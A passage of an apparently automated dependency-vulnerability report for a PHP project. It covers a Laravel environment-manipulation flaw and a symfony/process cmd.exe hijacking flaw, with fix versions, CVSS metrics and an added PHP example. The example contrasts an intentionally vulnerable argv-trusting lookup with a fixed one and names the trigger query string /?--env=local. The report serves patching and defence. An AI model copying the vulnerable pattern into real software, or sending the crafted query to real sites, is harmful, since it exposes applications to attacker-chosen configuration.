Fix Resolution: symfony/http-foundation - v5.4.46,v6.4.14,v7.1.7

CVE-2024-52301

Vulnerable Library - laravel/framework-v8.1.0

The Laravel Framework.

Library home page: https://api.github.com/repos/laravel/framework/zipball/d769a497a20e4a374ff7454dde7eee65145e3659

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

Laravel is a web application framework. When the register_argc_argv PHP directive is set to On and a user calls any URL with a specially crafted query string, they can change the environment the framework uses when handling the request. The vulnerability is fixed in 6.20.45, 7.30.7, 8.83.28, 9.52.17, 10.48.23, and 11.31.0: the framework now ignores argv values for environment detection on non-CLI SAPIs. The 0.0 score below reflects a vector with no impact metrics assigned, not an assessment that the issue is harmless; 8.83.28 is a patch release on the 8.x line, so this is one of the cheap fixes on this page. Setting register_argc_argv = Off for the web SAPI also removes the trigger.
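Added example, not Laravel's environment detection code: two versions of the same lookup model the behaviour CVE-2024-52301 describes, one trusting $_SERVER['argv'] on every SAPI, the other only on the CLI, plus a check for the register_argc_argv directive. The $_SERVER array is constructed as php-fpm would populate it for GET /?--env=local with the directive on.

```php
<?php
declare(strict_types=1);

// Added example, not Laravel's environment detection. Two versions of the
// same lookup model the behaviour the advisory describes: the first trusts
// $_SERVER['argv'] on every SAPI, the second only on the CLI.
function environmentLegacy(array $server, string $default = 'production'): string
{
    // With register_argc_argv=On, a web request to /?--env=local populates
    // $_SERVER['argv'] with ['--env=local'], so this loop runs for HTTP too.
    foreach ($server['argv'] ?? [] as $arg) {
        if (str_starts_with($arg, '--env=')) {
            return substr($arg, strlen('--env='));
        }
    }
    return $server['APP_ENV'] ?? $default;
}

function environmentFixed(array $server, string $sapi, string $default = 'production'): string
{
    // argv is only meaningful when the process was really started from a shell.
    if ($sapi === 'cli') {
        foreach ($server['argv'] ?? [] as $arg) {
            if (str_starts_with($arg, '--env=')) {
                return substr($arg, strlen('--env='));
            }
        }
    }
    return $server['APP_ENV'] ?? $default;
}

/** Deployment check: is the directive on for the SAPI this script runs under? */
function registerArgcArgvIsOn(): bool
{
    return filter_var(ini_get('register_argc_argv'), FILTER_VALIDATE_BOOLEAN);
}

// Constructed $_SERVER as php-fpm would build it for GET /?--env=local
$server = ['APP_ENV' => 'production', 'argv' => ['--env=local'], 'argc' => 1];
printf("legacy, fpm-fcgi : %s\n", environmentLegacy($server));
printf("fixed,  fpm-fcgi : %s\n", environmentFixed($server, 'fpm-fcgi'));
printf("fixed,  cli      : %s\n", environmentFixed($server, 'cli'));
printf("register_argc_argv on this SAPI (%s): %s\n", PHP_SAPI, registerArgcArgvIsOn() ? 'On' : 'Off');
```

Run the last line under the web SAPI (not php-cli, whose php.ini is usually separate) to learn whether the trigger exists on a given host; the framework upgrade removes the sink, the ini setting removes the source, and doing both costs nothing.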

Publish Date: 2024-11-12

URL: CVE-2024-52301

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Origin: GHSA-gv7v-rgg6-548h

Release Date: 2024-11-12

Fix Resolution: laravel/framework-6.20.45,7.30.7,8.83.28,9.52.17,10.48.23,11.31.0

CVE-2024-51736

Vulnerable Library - symfony/process-v5.1.5

Symfony Process Component

Library home page: https://api.github.com/repos/symfony/process/zipball/1864216226af21eb76d9477f691e7cbf198e0402

Dependency Hierarchy:

  • laravel/framework-v8.1.0 (Root Library)
    • symfony/process-v5.1.5 (Vulnerable Library)

Found in HEAD commit: c84aace76ec3ee3adbeb9350245a685969209ed1

Found in base branch: main

Vulnerability Details

symfony/process is a component of the Symfony PHP framework that executes commands in sub-processes. On Windows, when an executable file named "cmd.exe" is located in the current working directory, it is called by the "Process" class when preparing command arguments, leading to possible hijacking. This issue has been addressed in release versions 5.4.46, 6.4.14, and 7.1.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Publish Date: 2024-11-06

URL: CVE-2024-51736

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

Suggested Fix

Type: Upgrade version

Release Date: 2024-11-06

Fix Resolution: symfony/process - v5.4.46,v6.4.14,v7.1.7
